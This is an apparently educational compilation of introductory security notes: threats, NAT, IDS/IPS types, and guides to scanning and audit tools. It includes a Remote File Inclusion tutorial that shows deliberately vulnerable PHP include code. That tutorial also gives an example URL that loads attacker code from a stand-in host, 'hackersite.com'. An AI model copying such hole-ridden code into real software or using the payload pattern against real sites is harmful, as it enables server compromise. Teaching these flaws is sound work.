IT Security: Threats and vulnerabilities

The risks associated with information security can be classified into two categories, threats and vulnerabilities. Threats refer to the actions of people and nature that endanger an organization’s information assets and infrastructure. Vulnerabilities are the weaknesses in the assets and infrastructure that are at risk of unintended and unwanted events. Rather than being unrelated, threats and vulnerabilities are two sides of the same coin, threats are the potential actions that will follow the path of least resistance to the greatest vulnerabilities.

THREATS

A security threat is the wilful intention on someone’s part to inflict injury or damage to an individual’s or organization’s networks, computers, software or data. Threats come from people in the organization itself: employees, contractors and visitors. People outside the organization also threaten it. The types of injury or damage that could occur are practically limitless. A few examples include:

Ø  Sabotage of computer hardware or software

Ø  Theft and subsequent disclosure of proprietary or personally sensitive information

Ø  Attacks on information infrastructure to render it unavailable for legitimate uses

Ø  Development and release of a virus or worm intended to cause widespread damage.

VULNERABILITIES

Vulnerability is any weakness in computer or network hardware or software that makes it open to attack or damage. Vulnerability can be the result of an imperfection in design, implementation or configuration. While vulnerability is generally thought of as an oversight, the existence of vulnerability can be the result of a deliberate act. Some examples of vulnerabilities include:

Ø  A flaw in a software program that permits an intruder to cause the program to malfunction, generally with the intention of breaking into the system running the program

Ø  An operating system misconfigurations that permits an ordinary user to switch to privileged mode, which gives the user full administrative control over the system

Ø  A flaw in a business process that permits an employee to log in using a new employee’s account by entering a well-known default/initial password

Ø  A recently installed system with default administrative passwords, permitting anyone with knowledge of the password to gain full access to the system

Ø  Servers in the enterprise that individuals set up on their own that lack anti-virus protection and security patches.

Different Types of Network Address Translation

Three basic types of NAT 

Static mapping 

The network address translation has a pool of public IP addresses configured. Each private address is statically mapped to a specific public address. So computer A always receives the public address x, computer B always receives the public address y, and so on. This is generally used for servers that need to keep the same public address at all times.

Dynamic mapping 

The network address translation has a pool of IP addresses, but instead of statically mapping a public address to a specific private address, it works on a first-come, first-served basis. So if A needs to communicate over the Internet, his system makes a request to the NAT server. The NAT server takes the first IP on the list and maps it to A is private address. The balancing act is to estimate how many computers will most likely need to communicate outside the internal network at one time. This estimate is the number of public addresses the company purchases, instead of purchasing one public address for each computer.

Port Address Translation

Port Address Translation (PAT), is an extension to network address translation (NAT) that permits multiple devices on a local area network (LAN) to be mapped to a single public IP address. The goal of PAT is to conserve IP addresses.

Most home networks use PAT. In such a scenario, the Internet Service Provider (ISP) assigns a single IP address to the home network's router. When Computer X logs on the Internet, the router assigns the client a port number, which is appended to the internal IP address. This, in effect, gives Computer X a unique address. If Computer Z logs on the Internet at the same time, the router assigns it the same local IP address with a different port number. Although both computers are sharing the same public IP address and accessing the Internet at the same time, the router knows exactly which computer to send specific packets to because each computer has a unique internal address.

Port Address Translation is also called porting; port overloading, port-level multiplexed NAT and single address NAT.

Network Address Translation Basics 

Definition: I have one address I would like to share with everyone.

IP addresses have become hardly until the full adoption of IPv6 and expensive. So some smart people came up with network address translation (NAT), which enables a network that does not follow the internet’s addressing scheme to communicate over the internet. Private IP addresses have been reserved for internal LAN address use. These addresses can be used within the boundaries of a company, but they cannot be used on the internet. NAT enables a company to use these private addresses and still be able to communicate transparently with the computer on the internet.

Private IP address ranges

10.0.0.0—10.255.255.255                Class A networks

172.16.0.0—172.31.255.255             Class B networks

192.168.0.0—192.168.255.255        Class C networks

Many firewall vendors have implemented NAT into their products, and it has been found that NAT actually provides a great security benefit. When attackers want to hack a network, they first do what they can to learn all about the network and its topology, services, and addresses. Attackers cannot easily find out a company’s address scheme and its topology when NAT is in place, because NAT act as security guard by standing in front of the network and hiding the true IP scheme.

Network Address Translation (NAT)

The internet is expanding faster than anyone ever imagined.  A computer with communicate with other computers and web servers on the internet; it must have an IP address. An IP address is unique 32 bit number that identifies the location of your computer on a network. 

The total number of IP addresses 4,294,967,296 unique addresses (2³²). The actual number of addresses is smaller. These addresses are separated into classes, and because some addresses are set aside for multicasting, testing or research purpose. With the explosion of the Internet and the increase in home networks and business networks, the number of available IP addresses is simply not enough.

As the amount of information and resources increases, it is becoming a requirement for even the smallest businesses and homes to connect to the Internet. The obvious solution is to redesign the address format to allow for more possible addresses. This is being developed (called IPv6), but will take several years to implement because it requires modification of the entire infrastructure of the Internet. This is where NAT comes to the rescue part. Network Address Translation (NAT) is a method of connecting multiple computers to the Internet using one IP address. 

Rootkit Detection: Rootkit Revealer

RootkitRevealer uses a cross view approach and focuses only on the File system and Registry. The benefit of this tool is fast, simple and effective. It does not scan for loaded kernel modules; it quickly detects both the hidden registry keys and the files being hidden by the rootkit.

Installation:

Ø  Download the Rootkit Revealer.exe (231 KB) file copy into the computer.

Ø  Double Click à Agree à Agree, that’s it.

Usage:

Ø  Click File à Scan, it will show number of discrepancies.

Ø  Click File à Save.

It is necessary to examine all discrepancies.

Webpage Structure and Remote File 

Inclusion

I. WEBSITE STRUCTURE

In this section, we will show how a web page is built up in general. A normal website consists of HTML. The HTML consists of a HEAD section and a BODY section.

LOGO

NAVIGATION

MAIN CONTENT

NAVIGATION OR COPYRIGHT

(Normal looking website layout)

The image above is one of the most common website layouts ever.

 Code:

<html> <head> <title>A Common Website Layout</title> </head> <body> <div align="center" class="logo-area"></div> <div align="center" class="navigation-area"> <a href="index.php?page=home">Home</a> <a href="index.php?page=page1">Page1</a> <a href="index.php?page=page2">Page2</a> </div> <div align="center" class="main-content-area"> Content Content Content

This is one of an endless amount of ways you could build this website layout with HTML. It will have a logo, navigation, and a main content area. The navigation will have three links (Home, Page1 and Page2). But none of the links will do anything other than sending you to the same page over and over again without changing the content. This type of page is referred to as a static HTML page. The HTML of any page can be viewed by right clicking the page in your browser and the go to 'view source' or something similar. This is not true for viewing PHP code in web pages. The only way to view the PHP code of a page is if you can read the file itself, not from your browser. Commonly, RFI attacks are possible because of a PHP configuration flag called register_globals. It’s automatically defines variables in the script that are sent to the webpage with method GET. Typically PHP URL looks like: http://www.oursite.com/index.php this is an example only, there is no such sites. Now we can rewrite the page above with PHP code in it, to make different content for each of the links (Home, Page1 and Page2).

Code:

<html> <head> <title>A Common Website Layout</title> </head> <body> <div align="center" class="logo-area"></div> <div align="center" class="navigation-area"> <a href="index.php?page=home">Home</a> <a href="index.php?page=page1">Page1</a> <a href="index.php?page=page2">Page2</a> </div> <div align="center" class="main-content-area"> <?php

The first things the PHP code will look at GET method or arguments with the name “page” are present in the URL. If it is it will look further for the argument's value. If the value is "home", it will write out "home" to the HTML source. If the argument's value is "page1" it will write home "page1" to the HTML source and so on.However if the argument is not present in the URL, it will show index.php. So the script will give the equivalent value of the “home” page. Navigation link

Ø  Home goes to http://www.oursite.com/index.php?

Ø  Page1 goes to http://www.oursite.com/index.php?page=page1

Ø  Page2 goes to http://www.oursite.com/index.php?page=page2 and so on.

 II. UNDERSTANDING RFI

In itself, they include() function is not vulnerable to anything. It’s wrong and dangerous use of it that causes the security issues. They include() function is not limited to reading local files. It can even read remote files from URL's. So you could do include ("http://site.com/pages/page.txt") and it would include the contents of page.txt this is what creates RFI scenarios. Let’s create a new scenario index.php, 1.php, 2.php, and 3.php. index.php is the file the users are going to visit with his browser. When the user first visits the index.php, then we are going to display 3 links.

Code:

<a href="index.php?page=1">Page 1</a> <a href="index.php?page=2">Page 2</a> <a href="index.php?page=3">Page 3</a>

When the user clicks the first link its going to show the content of 1.php, when the user clicks the second link its going to show the contents of 2.php and when the user clicks the last link its going to show the contents of 3.php, look at the index.php script now the coding is to create security holes.

Code:

if (isset($_GET['page'])) { // The GET argument is present. Lets include the page. include($_GET['page'] . ".php"); } else { // The GET argument is not present. Lets give the poor guy some links! echo('<p><a href="index.php?page=1">Page 1</a></p>'); echo('<p><a href="index.php?page=2">Page 2</a></p>'); echo('<p><a href="index.php?page=3">Page 3</a></p>'); }

Now click the Page 1 link, it will show (www.oursite.com/index.php?page=1). The PHP script in index.php will now see that the user is requesting the page called 1 and it will include the number in the URL GET argument + ".php" the same goes for 2 and 3. So, for Page 1 it will include 1.php, for Page 2 it will include 2.php and for Page 3 it will include 3.php. The above script is a death trap. Like (www.oursite.com/index.php?page=4?), it will try to include 4.php, but that file obviously does not exist. So the page would return an error message like this:

Warning: include (4.php) [function.include ]: failed to open stream : No such file or directory in PATH online 3 Warning: include () [function.include ]: Failed opening '4.php' for inclusion (include _path='.;PATH') in PATH\\index .php online 3

It’s important to note that, not all web servers will show error messages when there is an error. We will try this index.php?page=http://hackersite.com/hackercode (this is an example only, there is no such sites). The PHP script would try to include whatever http://hackersite.com/hackercode.php contains. And if hackercode.php contains more PHP code, it would also get executed. Meaning we can run any PHP command or function on the server. This is extremely dangerous. Now we will show .txt index.php?page=http:// hackersite.com/hackerscript.txt and not hackerscript.txt.php because the ? Sign makes .php and GET argument.

Different Types of Intrusion 

Prevention System

The intrusion prevention system is identify the malicious activity, log information about system or network, and report activity. In particularly, IPS can take such action as sending an alarm, dropping malicious packets, resetting the connection or blocking the traffic from the offending IP address. An IPS can also correct cyclic redundancy check (CRC) errors, prevent TCP sequencing issues, and clean up unwanted transport and network layer options.

There are four different types of IPS

Network Based Intrusion Prevention System (NIPS)

The network based IPS, also known as “In line proactive protection.”  It will intercept all network traffic and inspects for suspicious behavior and code, either blocking malicious traffic or passing legitimate traffic forward.

Host Based Intrusion Prevention System (HIPS)

This will monitors a single host for suspicious activity by analyzing events occurring within that host.

Wireless Intrusion Prevention System (WIPS)

This type of activity monitors system that scans the WLAN channel, notifies personnel of suspicious activity, and sometimes, blocks activity discovers.

Network behavior analysis (NBA)

This will monitor the traffic and noting unusual actions or departures from normal operation, packet inspection, signature detection and real time blocking. NBA is always watching what’s happening inside the network, aggregating data from many points to support offline analysis.

Types of Intrusion Detection System

The goal of an intrusion detection system (IDS) is inspects all inbound and outbound network activity and identifies suspicious packets that may indicate to identify and monitor for evidence of attacks.  

There are three main types of IDS

Network Intrusion Detection System (NIDS)

Network Intrusion Detection System is to monitor the traffic travelling to or from different devices (network hub, network switch configured port monitoring, etc.) on the network.

Host Based Intrusion Detection System (HIDS)

It consists of a software set up, which has to be monitored. The software makes use of log files or auditing agents (binaries, password files, capability databases, access control list, etc.) of the system in the form of sources of data.

Stack Based Intrusion Detection System (SIDS)

Every packet is examined as they go through the TCP/IP stack and, therefore, it is not necessary for them to work with the network interface promiscuous mode. This fact makes its implementation to be dependent on the operating system that is being used.

WinAudit: PC Audit and Inventory

This is about every aspect of computer inventory is examined. The report is displayed as a web page, which can be saved in a number of standard formats. You can email it to your technical support or even post the audit to a database for archiving. When used in conjunction with its command line functionality, you can automate inventory administration at the network level. The program is easy to use and is a single file that requires no installation. WinAudit is designed to produce a comprehensive audit with one click of a button; ensuring results are obtained in the minimum possible time. The program is small and self-contained; it can be run from a floppy diskette, USB drive or sent by email enabling you to audit just about any Windows computer with virtually no effort in a few seconds.

Installation:

Download the Winaudit.exe (856 KB) file to your computer.

Ø  Double click the file, that’s all.

Usage:

Ø  Click àHere, it will start.

Port Scan: SuperScan

It will show that what hosts are available on the network, what services that host are offering (application name and version), and what operating system and OS versions they are running. The tool is described by powerful TCP port scanner, pinger and resolver.

Installation:

Download the SuperScan4.exe (196 KB) file to your computer

Ø  Double click the file, it will show error message. We must have local administrator privileges to run this program.

Ø  Click O.K. Now select the file right click select ‘Run as administrator’, it will work.

Usage:

Ø  Click à Scan tab, it will show Hostname/IP, Start IP, and End IP.

Ø  Enter à hostname or IP, you will scan specific computer

Ø  Enter à Start IP to End IP, you will scan specific network range

Ø  Click à Forward arrow button

Ø  Click à Play button, scan will start

Ø  Click à View HTML results tab, complete scan report will get HTML format, you will open with internet explorer

Passive Reconnaissance Tool: SiteDigger

SiteDigger is developed by foundstone. Built-in Google hacking database, supports for proxy and TOR, configurable result set, and provides results in real time. For all of the pen testers out there this is a semi passive reconnaissance tool.

Installation:

Ø  Download the sitedigger3.msi (1.23 MB) file into the Computer.

Ø  Double click the file à Click Run à Click Next

Ø  Click Next à Select I Agree

Ø  Select Just me à Click Next à Click Next

Ø  Click à Close

Usage:

It will show FSDB and GHDB

Ø  First I will click FSDB ° tree à we will check just a few boxes

Ø  Click à Scan, that’s all

No copy and pasting crap simply double click on any one of the results and it will pop up in our default web browser. 

File information : Fport

This is detailed information about which file or process is responsible for services, process ID and other network modifications and settings. This tool is very useful in analyzing a file and structure.

Fport reports all open TCP/IP and UDP ports and maps them to the owning application. This is the same information you would see using the 'netstat -an' command, but it also maps those ports to running processes with the PID, process name and path. Fport can be used to quickly identify unknown open ports and their associated applications.

Installation:

Download the Fport.exe (56 KB) file to your computer.

Place the Fport.exe file directly on your C drive. Fport works only if you navigate to where it is being stored in the command prompt. (E.g. C drive you stored à C:\fport, that’s it.)

Usage:

Ø  Start àRunà cmd

Ø  C:\>cd\

Ø  C:\ >fport –p

If you want to copy the output of fport into a file

Ø  C:\>fport –p >> [filename].txt

You can look at output and see if you notice any strange programs on your machine. Then use a command line ’kill’ utility such as” taskkill [specific PID]” to stop the program. Typically Trojans and some viruses will open up non standard ports which can be great clue to determining if a system is compromised or not. Watch out for open high numbered ports such as 3112, 31337, 12345, 7777, and 65000. Fport can be used on the windows NT4, Windows 2000, Windows XP.